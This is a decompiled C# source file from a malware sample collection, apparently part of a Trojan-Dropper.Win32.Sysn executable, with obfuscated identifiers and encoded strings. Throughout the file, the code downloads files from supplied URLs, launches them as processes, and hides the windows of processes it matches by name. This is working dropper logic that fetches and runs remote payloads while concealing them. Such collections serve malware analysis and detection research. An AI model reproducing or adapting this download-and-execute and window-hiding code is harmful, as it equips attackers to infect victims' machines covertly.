MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0002.cs

127 lines
3.8 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u0008;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
namespace \u0008
{
internal sealed class \u0002
{
[NonSerialized]
internal static \u0002 \u0001;
public static bool \u0001;
public static bool \u0002;
public static bool \u0003;
public static string \u0001;
public static string \u0002;
public static string \u0003;
public static string \u0004;
public static string \u0005;
public static string \u0006;
[DllImport("user32.dll", EntryPoint = "ShowWindow")]
private static extern int \u000F([In] int obj0, [In] int obj1);
internal static void \u000F([In] string obj0, [In] string obj1)
{
if (\u0002.\u000F())
{
\u0002.\u0010(obj0, obj1);
\u0002.\u0001 = true;
\u0002.\u0010(\u0002.\u0001(2144));
}
else if (!\u0002.\u0010())
{
if (!\u0002.\u0011())
return;
\u0002.\u000F(obj0);
\u0002.\u0003 = true;
\u0002.\u0010(\u0002.\u0001(2174));
}
else
{
\u0002.\u0011(obj0, obj1);
\u0002.\u0002 = true;
\u0002.\u0010(\u0002.\u0001(2157));
}
}
internal static bool \u000F() => System.IO.File.Exists(\u0002.\u0001);
internal static bool \u0010() => System.IO.File.Exists(\u0002.\u0003);
internal static bool \u0011() => System.IO.File.Exists(\u0002.\u0002);
private static void \u0010([In] string obj0, [In] string obj1)
{
new WebClient().DownloadFile(obj0, obj1);
Process.Start(new ProcessStartInfo()
{
FileName = \u0002.\u0001,
Arguments = \u0002.\u0001(2187) + Path.GetDirectoryName(Assembly.GetEntryAssembly().Location) + \u0002.\u0001(2204) + obj1
});
Thread.Sleep(1000);
}
private static void \u000F([In] string obj0)
{
Process.Start(new ProcessStartInfo()
{
FileName = \u0002.\u0002,
Arguments = obj0
});
Thread.Sleep(1000);
}
private static void \u0011([In] string obj0, [In] string obj1)
{
new WebClient().DownloadFile(obj0, obj1);
Process.Start(new ProcessStartInfo()
{
FileName = \u0002.\u0001,
Arguments = \u0002.\u0001(2187) + Path.GetDirectoryName(Assembly.GetEntryAssembly().Location) + \u0002.\u0001(2204) + obj1
});
Thread.Sleep(1000);
}
private static void \u0010([In] string obj0)
{
foreach (Process process in Process.GetProcesses())
{
if (process.ProcessName.Contains(obj0))
{
try
{
\u0002.\u000F(process.MainWindowHandle.ToInt32(), 0);
}
catch
{
}
}
}
}
static \u0002()
{
\u0003.\u000F();
\u0002.\u0001 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2209);
\u0002.\u0002 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2242);
\u0002.\u0003 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2267);
\u0002.\u0004 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2304);
\u0002.\u0005 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2321);
\u0002.\u0006 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2338);
}
}
}